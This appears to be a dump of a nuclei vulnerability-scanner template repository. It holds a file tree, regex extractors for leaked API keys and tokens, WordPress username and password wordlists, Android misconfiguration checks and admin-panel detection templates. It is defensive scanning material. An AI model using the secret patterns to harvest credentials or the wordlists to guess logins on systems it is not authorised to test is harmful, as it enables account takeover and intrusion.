├── .gitignore ├── helpers └── wordlists │ ├── wp-users.txt │ └── wp-passwords.txt ├── file ├── keys │ ├── google-api.yaml │ ├── mailgun-api.yaml │ ├── slack-api.yaml │ ├── pictatic-api-key.yaml │ ├── twilio-api.yaml │ ├── mailchimp-api.yaml │ ├── shopify-token.yaml │ ├── github-personal-token.yaml │ ├── twitter-secret.yaml │ ├── linkedin-id.yaml │ ├── sendgrid-api.yaml │ ├── shopify-shared-secret.yaml │ ├── square-oauth-secret.yaml │ ├── square-access-token.yaml │ ├── stripe-api-key.yaml │ ├── gcp-service-account.yaml │ ├── shopify-custom-token.yaml │ ├── shopify-private-token.yaml │ ├── dynatrace-token.yaml │ ├── facebook-client-id.yaml │ ├── facebook-secret.yaml │ ├── aws-access-id.yaml │ ├── cloudinary.yaml │ ├── credentials.yaml │ ├── paypal-braintree-token.yaml │ ├── firebase-database.yaml │ ├── slack-webhook.yaml │ └── amazon-mws-auth-token.yaml └── android │ ├── file-scheme.yaml │ ├── content-scheme.yaml │ ├── adb-backup-enabled.yaml │ ├── debug-enabled.yaml │ ├── webview-load-url.yaml │ ├── webview-javascript.yaml │ ├── certificate-validation.yaml │ ├── biometric-detect.yaml │ ├── webview-universal-access.yaml │ ├── webview-addjavascript-interface.yaml │ ├── dynamic-broadcast-receiver.yaml │ └── provider-path.yaml ├── .github ├── ISSUE_TEMPLATE │ ├── submit-template.md │ └── feature_request.md └── workflows │ └── syntax-checking.yml ├── .pre-commit-config.yaml ├── workflows ├── jira-workflow.yaml ├── gitlab-workflow.yaml ├── grafana-workflow.yaml ├── lucee-workflow.yaml ├── confluence-workflow.yaml ├── weblogic-workflow.yaml ├── phpmyadmin-workflow.yaml ├── aem-workflow.yaml ├── harbor-workflow.yaml ├── thinkcmf-workflow.yaml ├── cacti-workflow.yaml ├── liferay-workflow.yaml ├── springboot-workflow.yaml ├── bigip-workflow.yaml ├── netsweeper-workflow.yaml ├── samsung-wlan-ap-workflow.yaml ├── rabbitmq-workflow.yaml ├── azkaban-workflow.yaml ├── thinkphp-workflow.yaml ├── wordpress-workflow.yaml ├── artica-web-proxy-workflow.yaml ├── jellyfin-workflow.yaml ├── micro-focus-workflow.yaml ├── magmi-workflow.yaml ├── cisco-asa-workflow.yaml ├── mida-eframework-workflow.yaml ├── magento-workflow.yaml ├── vbulletin-workflow.yaml ├── cockpit-workflow.yaml └── worksite-takeover-workflow.yaml ├── exposed-panels ├── crxde-lite.yaml ├── jmx-console.yaml ├── solr-exposure.yaml ├── oipm-detect.yaml ├── couchdb-fauxton.yaml ├── flink-exposure.yaml ├── citrix-vpn-detect.yaml ├── cx-cloud-login.yaml ├── hadoop-exposure.yaml ├── kafka-connect-ui.yaml ├── netscaler-gateway.yaml ├── rabbitmq-dashboard.yaml ├── call-break-cms.yaml ├── kafka-topics-ui.yaml ├── kubernetes-dashboard.yaml ├── rocketmq-console-exposure.yaml ├── kronos-workforce-central.yaml ├── zipkin-exposure.yaml ├── kafka-monitoring.yaml ├── mantis-detect.yaml ├── solarwinds-orion.yaml ├── sonarqube-login.yaml ├── aims-password-mgmt-client.yaml ├── sonicwall-sslvpn-panel.yaml ├── supervpn-panel.yaml ├── bazarr-login.yaml ├── compal-panel.yaml ├── saferoads-vms-login.yaml ├── exposed-pagespeed-global-admin.yaml ├── parallels-html-client.yaml ├── manage-engine-admanager-panel.yaml ├── dotcms-admin-panel.yaml ├── druid-console-exposure.yaml ├── github-enterprise-detect.yaml ├── ansible-tower-exposure.yaml ├── exposed-webalizer.yaml ├── phppgadmin-panel.yaml ├── traefik-dashboard.yaml ├── webmin-panel.yaml ├── active-admin-exposure.yaml ├── prometheus-exposed-panel.yaml ├── selenoid-ui-exposure.yaml ├── activemq-panel.yaml ├── atlassian-crowd-panel.yaml ├── checkmarx-panel.yaml ├── hmc-hybris-panel.yaml ├── sonicwall-management-panel.yaml ├── django-admin-panel.yaml ├── jenkins-login.yaml ├── somfy-login.yaml ├── citrix-adc-gateway-detect.yaml ├── fortinet-fortigate-panel.yaml ├── lancom-router-panel.yaml ├── sap-hana-xsengine-panel.yaml ├── ambari-exposure.yaml ├── rstudio-detect.yaml ├── sharecenter-login.yaml ├── xenforo-login.yaml ├── cisco-asa-panel.yaml ├── clave-login-panel.yaml ├── hivemanager-login-panel.yaml ├── netlify-cms.yaml ├── netscalar-aaa-login.yaml ├── workspace-one-uem.yaml ├── livezilla-login-panel.yaml ├── strapi-panel.yaml ├── ems-login-panel.yaml ├── securenvoy-panel.yaml ├── yarn-manager-exposure.yaml ├── jfrog.yaml ├── octoprint-login.yaml ├── openerp-database.yaml ├── zenario-login-panel.yaml ├── go-anywhere-client.yaml ├── joomla-panel.yaml ├── powerlogic-ion.yaml ├── sap-netweaver-portal.yaml ├── airflow-panel.yaml ├── glpi-login.yaml ├── sitecore-login-panel.yaml ├── synnefo-admin-panel.yaml ├── virtual-ema-detect.yaml ├── oki-data.yaml ├── plesk-obsidian.yaml ├── plesk-onyx.yaml ├── total-web.yaml ├── web-service-panel.yaml ├── couchdb-exposure.yaml ├── globalprotect-panel.yaml ├── remote-ui-login.yaml ├── vigor-login.yaml ├── blue-iris-login.yaml ├── grafana-detect.yaml ├── weave-scope-dashboard-detect.yaml ├── acunetix-panel.yaml ├── gitlab-detect.yaml ├── r-webserver-login.yaml ├── siteomat-login.yaml ├── web-local-craft.yaml ├── whm-login-detect.yaml ├── xvr-login.yaml └── faraday-login.yaml ├── technologies ├── home-assistant.yaml ├── weblogic-detect.yaml ├── cockpit-detect.yaml ├── maian-cart-detect.yaml ├── s3-detect.yaml ├── sql-server-reporting.yaml ├── werkzeug-debugger-detect.yaml ├── shiro-detect.yaml ├── google-storage.yaml ├── default-iis7-page.yaml ├── default-tomcat-page.yaml ├── telerik-fileupload-detect.yaml ├── fanruanoa2012-detect.yaml ├── default-jetty-page.yaml ├── harbor-detect.yaml ├── default-nginx-page.yaml ├── xxljob-admin-detect.yaml ├── itop-detect.yaml ├── node-red-detect.yaml ├── yapi-detect.yaml ├── basic-auth-detection.yaml ├── default-fastcgi-page.yaml ├── default-openresty.yaml ├── firebase-detect.yaml ├── jeedom-detect.yaml ├── sage-detect.yaml ├── default-asp.net-page.yaml ├── default-plesk-page.yaml ├── opencast-detect.yaml ├── airflow-detect.yaml ├── daybyday-detect.yaml ├── teradici-pcoip.yaml ├── dotclear-detect.yaml ├── druid-detect.yaml ├── froxlor-detect.yaml ├── influxdb-detect.yaml ├── oneblog-detect.yaml ├── bigbluebutton-detect.yaml ├── crush-ftp-detect.yaml ├── default-windows-server-page.yaml ├── voipmonitor-detect.yaml ├── artica-web-proxy-detect.yaml ├── fanruanoa-detect.yaml ├── herokuapp-detect.yaml ├── jaspersoft-detect.yaml ├── jitsi-meet.yaml ├── magmi-detect.yaml ├── thinkcmf-detection.yaml ├── bedita-detect.yaml ├── default-fedora-page.yaml ├── default-payara-server-page.yaml ├── gespage-detect.yaml ├── strapi-cms-detect.yaml ├── centreon-detect.yaml └── default-apache2-ubuntu-page.yaml ├── .yamllint ├── exposures ├── tokens │ ├── picatic │ │ └── picatic-api-key.yaml │ ├── bitly │ │ └── bitly-secret-key.yaml │ ├── newrelic │ │ ├── newrelic-admin-api-key.yaml │ │ ├── newrelic-rest-api-key.yaml │ │ ├── newrelic-insights-key.yaml │ │ └── newrelic-synthetics-location-key.yaml │ ├── slack │ │ ├── slack-user-token.yaml │ │ ├── slack-bot-token.yaml │ │ └── slack-webhook-token.yaml │ ├── stripe │ │ ├── stripe-secret-key.yaml │ │ └── stripe-restricted-key.yaml │ ├── google │ │ ├── oauth-access-key.yaml │ │ ├── google-api-key.yaml │ │ ├── fcm-server-key.yaml │ │ └── google-calendar-link.yaml │ ├── sendgrid │ │ └── sendgrid-api-key.yaml │ ├── generic │ │ ├── jwt-token.yaml │ │ ├── jdbc-connection-string.yaml │ │ └── shoppable-token.yaml │ ├── sonarqube │ │ └── sonarqube-token.yaml │ ├── amazon │ │ ├── amazon-sns-topic.yaml │ │ ├── aws-access-key-value.yaml │ │ └── amazon-mws-auth-token.yaml │ ├── artifactory │ │ ├── artifactory-api-token.yaml │ │ └── artifactory-api-password.yaml │ ├── discord │ │ └── discord-webhook.yaml │ ├── zoho │ │ └── zoho-webhook-token.yaml │ ├── mailchimp │ │ └── mailchimp-api-key.yaml │ ├── paypal │ │ └── braintree-access-token.yaml │ ├── zapier │ │ └── zapier-webhook-token.yaml │ ├── cloudinary │ │ └── cloudinary-credentials.yaml │ └── microsoft │ │ └── microsoft-teams-webhook.yaml ├── apis │ ├── wsdl-api.yaml │ └── strapi-page.yaml ├── configs │ ├── perl-status.yaml │ ├── ansible-config-disclosure.yaml │ ├── airflow-configuration-exposure.yaml │ ├── symfony-profiler.yaml │ ├── amazon-docker-config-disclosure.yaml │ ├── exposed-hg.yaml │ ├── xprober-service.yaml │ ├── exposed-vscode.yaml │ ├── web-config.yaml │ ├── httpd-config.yaml │ └── samba-config.yaml ├── logs │ ├── struts-debug-mode.yaml │ ├── elmah-log-file.yaml │ ├── rails-debug-mode.yaml │ └── npm-log-file.yaml └── files │ ├── drupal-install.yaml │ ├── lazy-file.yaml │ ├── phpunit.yaml │ └── keycloak-json.yaml ├── vulnerabilities ├── wordpress │ ├── wp-xmlrpc.yaml │ └── wp-license-file.yaml ├── vmware │ └── vmware-vcenter-lfi-linux.yaml ├── jira │ ├── jira-unauthenticated-user-picker.yaml │ └── jira-unauthenticated-projects.yaml ├── other │ ├── myucms-lfr.yaml │ ├── aspnuke-openredirect.yaml │ ├── 74cms-sqli.yaml │ └── rce-shellshock-user-agent.yaml └── jenkins │ └── unaunthenticated-jenkin.yaml ├── dns ├── servfail-refused-hosts.yaml └── worksites-detection.yaml ├── network ├── smtp-detection.yaml ├── memcached-stats.yaml ├── sap-router.yaml ├── expn-mail-detect.yaml ├── java-rmi-detect.yaml ├── starttls-mail-detect.yaml ├── unauth-ftp.yaml ├── exposed-zookeeper.yaml ├── printers-info-leak.yaml ├── ftp-default-credentials.yaml └── vnc-detect.yaml ├── takeovers ├── urge-takeover.yaml ├── kinsta-takeover.yaml ├── jazzhr-takeover.yaml ├── mashery-takeover.yaml ├── readme-takeover.yaml ├── smugmug-takeover.yaml ├── surveygizmo-takeover.yaml ├── tave-takeover.yaml ├── hatenablog-takeover.yaml ├── zendesk-takeover.yaml ├── feedpress-takeover.yaml ├── gemfury-takeover.yaml ├── jetbrains-takeover.yaml ├── readthedocs-takeover.yaml ├── teamwork-takeover.yaml ├── agilecrm-takeover.yaml ├── aha-takeover.yaml ├── vend-takeover.yaml ├── helpjuice-takeover.yaml ├── wishpond-takeover.yaml ├── bigcartel-takeover.yaml ├── helpscout-takeover.yaml ├── airee-takeover.yaml ├── ngrok-takeover.yaml ├── brightcove-takeover.yaml ├── pantheon-takeover.yaml ├── uberflip-takeover.yaml ├── anima-takeover.yaml ├── simplebooklet-takeover.yaml ├── getresponse-takeover.yaml ├── webflow-takeover.yaml ├── wufoo-takeover.yaml ├── aftership-takeover.yaml ├── hubspot-takeover.yaml ├── proposify-takeover.yaml ├── frontify-takeover.yaml ├── launchrock-takeover.yaml ├── pingdom-takeover.yaml ├── worksites-takeover.yaml ├── cargocollective-takeover.yaml ├── canny-takeover.yaml ├── cargo-takeover.yaml ├── helprace-takeover.yaml ├── heroku-takeover.yaml ├── github-takeover.yaml ├── tumblr-takeover.yaml └── tictail-takeover.yaml ├── misconfiguration ├── jkstatus-manager.yaml ├── phpmyadmin-setup.yaml ├── cx-cloud-upload-detect.yaml ├── exposed-kafdrop.yaml ├── nginx │ └── nginx-status.yaml ├── laravel-debug-error.yaml ├── druid-monitor.yaml ├── rack-mini-profiler.yaml ├── elasticsearch.yaml ├── apc-info.yaml ├── tcpconfig.yaml └── cgi-test-page.yaml ├── cves ├── 2018 │ ├── CVE-2018-13379.yaml │ ├── CVE-2018-7251.yaml │ ├── CVE-2018-14728.yaml │ ├── CVE-2018-16341.yaml │ └── CVE-2018-7490.yaml └── 2020 │ └── CVE-2020-13927.yaml ├── miscellaneous ├── detect-options-method.yaml ├── dir-listing.yaml ├── display-via-header.yaml ├── email-extractor.yaml ├── addeventlistener-detect.yaml └── xml-schema-detect.yaml ├── iot ├── network-camera-detect.yaml ├── contacam.yaml ├── mobotix-guest-camera.yaml ├── epmp-login.yaml ├── internet-service.yaml ├── hp-laserjet-detect.yaml └── liveview-axis-camera.yaml └── .nuclei-ignore /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/ 2 | .DS_Store 3 | local/ 4 | .checksum 5 | .new-additions -------------------------------------------------------------------------------- /helpers/wordlists/wp-users.txt: -------------------------------------------------------------------------------- 1 | adm 2 | admin 3 | user 4 | admin1 5 | hostname 6 | manager 7 | qwerty 8 | root 9 | support 10 | sysadmin 11 | test 12 | -------------------------------------------------------------------------------- /file/keys/google-api.yaml: -------------------------------------------------------------------------------- 1 | id: google-api-key 2 | 3 | info: 4 | name: Google API key 5 | author: gaurang 6 | severity: info 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "AIza[0-9A-Za-z\\-_]{35}" -------------------------------------------------------------------------------- /file/keys/mailgun-api.yaml: -------------------------------------------------------------------------------- 1 | id: mailgun-api-key 2 | 3 | info: 4 | name: Mailgun API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "key-[0-9a-zA-Z]{32}" -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/submit-template.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Submit Template 3 | about: Submit nuclei template using issue 4 | title: "[nuclei-template] template-name" 5 | labels: 'nuclei-template' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Template Details** 11 | 12 | ```yaml 13 | 14 | nuclei template goes here 15 | ``` 16 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/pre-commit/pre-commit-hooks 3 | rev: v2.3.0 4 | hooks: 5 | - id: end-of-file-fixer 6 | - id: trailing-whitespace 7 | - repo: https://github.com/adrienverge/yamllint.git 8 | rev: v1.17.0 9 | hooks: 10 | - id: yamllint 11 | -------------------------------------------------------------------------------- /file/android/file-scheme.yaml: -------------------------------------------------------------------------------- 1 | id: file-scheme 2 | 3 | info: 4 | name: File Scheme Enabled 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - xml 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "android:scheme=\"file\"" -------------------------------------------------------------------------------- /file/keys/slack-api.yaml: -------------------------------------------------------------------------------- 1 | id: slack-api 2 | 3 | info: 4 | name: Slack API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "xox[baprs]-([0-9a-zA-Z]{10,48})?" -------------------------------------------------------------------------------- /file/keys/pictatic-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: pictatic-api-key 2 | 3 | info: 4 | name: Pictatic API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "sk_live_[0-9a-z]{32}" -------------------------------------------------------------------------------- /file/keys/twilio-api.yaml: -------------------------------------------------------------------------------- 1 | id: twilio-api 2 | 3 | info: 4 | name: Twilio API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" -------------------------------------------------------------------------------- /file/keys/mailchimp-api.yaml: -------------------------------------------------------------------------------- 1 | id: mailchimp-api-key 2 | 3 | info: 4 | name: Mailchimp API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "[0-9a-f]{32}-us[0-9]{1,2}" -------------------------------------------------------------------------------- /file/keys/shopify-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-access-token 2 | 3 | info: 4 | name: Shopify Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "shpat_[a-fA-F0-9]{32}" -------------------------------------------------------------------------------- /helpers/wordlists/wp-passwords.txt: -------------------------------------------------------------------------------- 1 | admin 2 | 123456 3 | password 4 | 12345678 5 | 666666 6 | 111111 7 | 1234567 8 | qwerty 9 | siteadmin 10 | administrator 11 | root 12 | 123123 13 | 123321 14 | 1234567890 15 | letmein123 16 | test123 17 | demo123 18 | pass123 19 | 123qwe 20 | qwe123 21 | 654321 22 | loveyou 23 | adminadmin123 24 | -------------------------------------------------------------------------------- /file/android/content-scheme.yaml: -------------------------------------------------------------------------------- 1 | id: content-scheme 2 | 3 | info: 4 | name: Content Scheme Enabled 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - xml 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "android:scheme=\"content\"" -------------------------------------------------------------------------------- /file/keys/github-personal-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-personal-token 2 | 3 | info: 4 | name: Github Personal Token 5 | author: geeknik 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "ghp_.{36}" 17 | -------------------------------------------------------------------------------- /file/keys/twitter-secret.yaml: -------------------------------------------------------------------------------- 1 | id: twitter-secret 2 | 3 | info: 4 | name: Twitter Secret 5 | author: gaurang 6 | severity: medium 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" -------------------------------------------------------------------------------- /workflows/jira-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: jira-workflow 2 | 3 | info: 4 | name: Jira Security Checks 5 | author: micha3lb3n 6 | description: A simple workflow that runs all Jira related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/jira-detect.yaml 10 | subtemplates: 11 | - tags: jira -------------------------------------------------------------------------------- /file/android/adb-backup-enabled.yaml: -------------------------------------------------------------------------------- 1 | id: adb-backup-enabled 2 | 3 | info: 4 | name: ADB Backup Enabled 5 | author: gaurang 6 | severity: low 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "android:allowBackup=\"true\"" -------------------------------------------------------------------------------- /file/android/debug-enabled.yaml: -------------------------------------------------------------------------------- 1 | id: android-debug-enabled 2 | 3 | info: 4 | name: Android Debug Enabled 5 | author: gaurang 6 | severity: low 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: regex 15 | regex: 16 | - "android:debuggable=\"true\"" -------------------------------------------------------------------------------- /file/keys/linkedin-id.yaml: -------------------------------------------------------------------------------- 1 | id: linkedin-client-id 2 | 3 | info: 4 | name: Linkedin Client ID 5 | author: gaurang 6 | severity: low 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}" -------------------------------------------------------------------------------- /file/keys/sendgrid-api.yaml: -------------------------------------------------------------------------------- 1 | id: sendgrid-api-key 2 | 3 | info: 4 | name: Sendgrid API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" -------------------------------------------------------------------------------- /file/keys/shopify-shared-secret.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-shared-secret 2 | 3 | info: 4 | name: Shopify Shared Secret 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "shpss_[a-fA-F0-9]{32}" -------------------------------------------------------------------------------- /file/keys/square-oauth-secret.yaml: -------------------------------------------------------------------------------- 1 | id: square-oauth-secret 2 | 3 | info: 4 | name: Square OAuth Secret 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "sq0csp-[0-9A-Za-z\\-_]{43}" -------------------------------------------------------------------------------- /workflows/gitlab-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: gitlab-workflow 2 | 3 | info: 4 | name: GitLab Security Checks 5 | author: pdteam 6 | description: A simple workflow that runs all GitLab related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/gitlab-detect.yaml 10 | subtemplates: 11 | - tags: gitlab -------------------------------------------------------------------------------- /file/keys/square-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: square-access-token 2 | 3 | info: 4 | name: Square Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "sq0atp-[0-9A-Za-z\\-_]{22}" 17 | -------------------------------------------------------------------------------- /file/keys/stripe-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: stripe-api-key 2 | 3 | info: 4 | name: Stripe API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" -------------------------------------------------------------------------------- /file/keys/gcp-service-account.yaml: -------------------------------------------------------------------------------- 1 | id: gcp-service-account 2 | 3 | info: 4 | name: Google (GCP) Service-account 5 | author: gaurang 6 | severity: low 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "\"type\": \"service_account\"" -------------------------------------------------------------------------------- /file/keys/shopify-custom-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-custom-token 2 | 3 | info: 4 | name: Shopify Custom App Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "shpca_[a-fA-F0-9]{32}" -------------------------------------------------------------------------------- /file/keys/shopify-private-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-private-token 2 | 3 | info: 4 | name: Shopify Private App Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "shppa_[a-fA-F0-9]{32}" -------------------------------------------------------------------------------- /exposed-panels/crxde-lite.yaml: -------------------------------------------------------------------------------- 1 | id: crxde-lite 2 | 3 | info: 4 | name: CRXDE Lite 5 | author: nadino 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/crx/de/index.jsp" 13 | matchers: 14 | - type: word 15 | words: 16 | - "CRXDE Lite" 17 | -------------------------------------------------------------------------------- /exposed-panels/jmx-console.yaml: -------------------------------------------------------------------------------- 1 | id: jmx-console 2 | info: 3 | name: JMX Console 4 | author: yashanand155 5 | severity: low 6 | tags: panel,jmx 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/jmx-console/' 12 | matchers: 13 | - type: word 14 | words: 15 | - JBoss JMX Management Console 16 | -------------------------------------------------------------------------------- /exposed-panels/solr-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: solr-exposure 2 | 3 | info: 4 | name: Apache Solr Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/solr/' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Solr Admin" -------------------------------------------------------------------------------- /file/keys/dynatrace-token.yaml: -------------------------------------------------------------------------------- 1 | id: dynatrace-token 2 | 3 | info: 4 | name: Dynatrace Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" -------------------------------------------------------------------------------- /workflows/grafana-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-workflow 2 | 3 | info: 4 | name: Grafana Security Checks 5 | author: pdteam 6 | description: A simple workflow that runs all Grafana related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/grafana-detect.yaml 10 | subtemplates: 11 | - tags: grafana 12 | -------------------------------------------------------------------------------- /workflows/lucee-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: lucee-workflow 2 | 3 | info: 4 | name: Lucee Detection Workflow 5 | author: geeknik,dhiyaneshDk 6 | description: A simple workflow that runs all Lucee related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/lucee-detect.yaml 10 | subtemplates: 11 | - tags: lucee 12 | -------------------------------------------------------------------------------- /file/keys/facebook-client-id.yaml: -------------------------------------------------------------------------------- 1 | id: facebook-client-id 2 | 3 | info: 4 | name: Facebook Client ID 5 | author: gaurang 6 | severity: info 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]" -------------------------------------------------------------------------------- /file/keys/facebook-secret.yaml: -------------------------------------------------------------------------------- 1 | id: facebook-secret-key 2 | 3 | info: 4 | name: Facebook Secret Key 5 | author: gaurang 6 | severity: low 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]" -------------------------------------------------------------------------------- /technologies/home-assistant.yaml: -------------------------------------------------------------------------------- 1 | id: home-assistant 2 | 3 | info: 4 | name: Detect Home Assistant 5 | author: fabaff 6 | severity: info 7 | tags: tech,iot 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Home Assistant" 17 | -------------------------------------------------------------------------------- /workflows/confluence-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: confluence-workflow 2 | 3 | info: 4 | name: Atlassian Confluence workflow 5 | author: philippedelteil 6 | description: Workflow that runs all Confluence related nuclei templates 7 | 8 | workflows: 9 | 10 | - template: technologies/confluence-detect.yaml 11 | subtemplates: 12 | - tags: confluence 13 | -------------------------------------------------------------------------------- /workflows/weblogic-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: weblogic-workflow 2 | info: 3 | name: WebLogic Security Checks 4 | author: dr_set 5 | description: A simple workflow that runs all WebLogic related nuclei templates on a given target. 6 | 7 | workflows: 8 | - template: technologies/weblogic-detect.yaml 9 | 10 | subtemplates: 11 | - tags: weblogic -------------------------------------------------------------------------------- /exposed-panels/oipm-detect.yaml: -------------------------------------------------------------------------------- 1 | id: oipm-detect 2 | info: 3 | name: One Identity Password Manager detection 4 | author: nodauf 5 | severity: info 6 | tags: panel 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/PMUser/' 12 | matchers: 13 | - type: word 14 | words: 15 | - "One Identity Password Manager" -------------------------------------------------------------------------------- /file/android/webview-load-url.yaml: -------------------------------------------------------------------------------- 1 | id: webview-load-url 2 | 3 | info: 4 | name: Webview loadUrl usage 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V" -------------------------------------------------------------------------------- /file/keys/aws-access-id.yaml: -------------------------------------------------------------------------------- 1 | id: aws-access-key 2 | 3 | info: 4 | name: AWS Access Key ID 5 | author: gaurang 6 | severity: info 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 17 | -------------------------------------------------------------------------------- /file/keys/cloudinary.yaml: -------------------------------------------------------------------------------- 1 | id: cloudinary-basic-auth 2 | 3 | info: 4 | name: Cloudinary Basic Auth 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+" -------------------------------------------------------------------------------- /workflows/phpmyadmin-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-workflow 2 | 3 | info: 4 | name: phpmyadmin-workflow 5 | author: philippedelteil 6 | description: A workflow that runs all PhpMyAdmin related nuclei templates on a given target 7 | 8 | workflows: 9 | - template: exposed-panels/phpmyadmin-panel.yaml 10 | subtemplates: 11 | - tags: phpmyadmin 12 | 